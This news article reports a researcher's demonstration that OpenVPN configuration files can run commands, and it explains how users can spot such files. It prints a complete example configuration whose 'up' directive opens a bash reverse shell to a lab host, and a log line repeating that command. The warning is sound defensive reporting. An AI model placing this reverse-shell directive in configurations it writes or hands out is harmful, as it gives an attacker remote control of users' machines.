Call me a cynic, but one thing I have learned from using the Internet is to double-check, if not triple-check, everything you download. So many downloads carry malware, adware, and scripts that perform malicious activities on your computer that thoroughly checking a download before it's used has to be a requirement.
This point is shown in research posted by Tenable reverse engineer Jacob Baines, where he shows how a normally harmless VPN configuration file can be used to open a backdoor on a computer that uses it.
In his article, Baines explains how a simple OpenVPN configuration file can be used to execute commands on a computer after a VPN connection is made. This could also allow attackers to distribute OpenVPN configuration files that automatically execute commands to open backdoors through a reverse shell or perform other unwanted behavior on the computer.
OpenVPN is a popular open-source VPN program that allows you to create a secure and encrypted network connection between your computer or device and another network. Due to its popularity, it has been ported to work on a variety of devices, including routers that run DD-WRT. To facilitate this, VPN providers create OpenVPN profiles that can be downloaded and installed in order to easily configure a VPN connection.
According to Baines, all a bad actor would need to do to make a harmless OpenVPN configuration file (.ovpn) malicious is add a few lines to it. In Baines' example, an OpenVPN configuration file is simply a text file with some directives in it:

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
If an actor wanted to cause the OpenVPN configuration file to execute a command, they would add the "script-security 2" line, which allows user-defined scripts to be executed, and an "up" entry, which contains the command that is executed after a connection has been made. As an example, he changed the above configuration file so that it executes a command as shown below.

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&'"
When this configuration file is used and after a connection has been established, OpenVPN will execute the above command to open a reverse shell to the computer at 192.168.1.218. This would allow the attacker at that IP address to execute commands on the remote computer that ran the OpenVPN configuration file.
Baines even goes on to show how the above method could be ported to attack Windows users by using a PowerShell script instead.
While this shows you should be careful about downloading OpenVPN configs from third parties, Baines told BleepingComputer that he has not found any malicious configs currently in the wild.
Now that you know that an OpenVPN configuration file could be used against you, you may be wondering how to check whether any that you use are malicious.
In his article, Baines states that you can find clues in a VPN connection log as shown below.
Thu Jun 7 12:28:23 2018 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Thu Jun 7 12:28:23 2018 /bin/bash -c /bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1& tun0 1500 1500 10.200.0.2 10.200.0.1 init
If you see the above lines in your log, it means the "script-security 2" setting was used, which allows user-defined scripts to be executed. As that line is required to run scripts, it follows that something is being executed by the configuration file. You should be able to spot the command being executed, as shown by the second line in the log above.
As OpenVPN configuration files are simply text files, you can also check if an OpenVPN configuration is malicious by opening the file up in Notepad or another text editor. This will allow you to see the entire configuration file and spot if any commands are being executed.
Unfortunately, OpenVPN has other configuration directives that can execute commands as well, and Baines recommends that users use the Viscosity OpenVPN client instead, which filters out these types of commands.
"Unfortunately, the up command is not the only command that can be used in this way," Baines told BleepingComputer. "Up, down, client-connect, learn-address, auth-user-pass-verify, and learn-address all execute configuration specified commands (although some of these are server specific). A lay person might try to review and understand the configuration file. However, I think it's safer to use a client like Viscosity that simply filters out this behavior."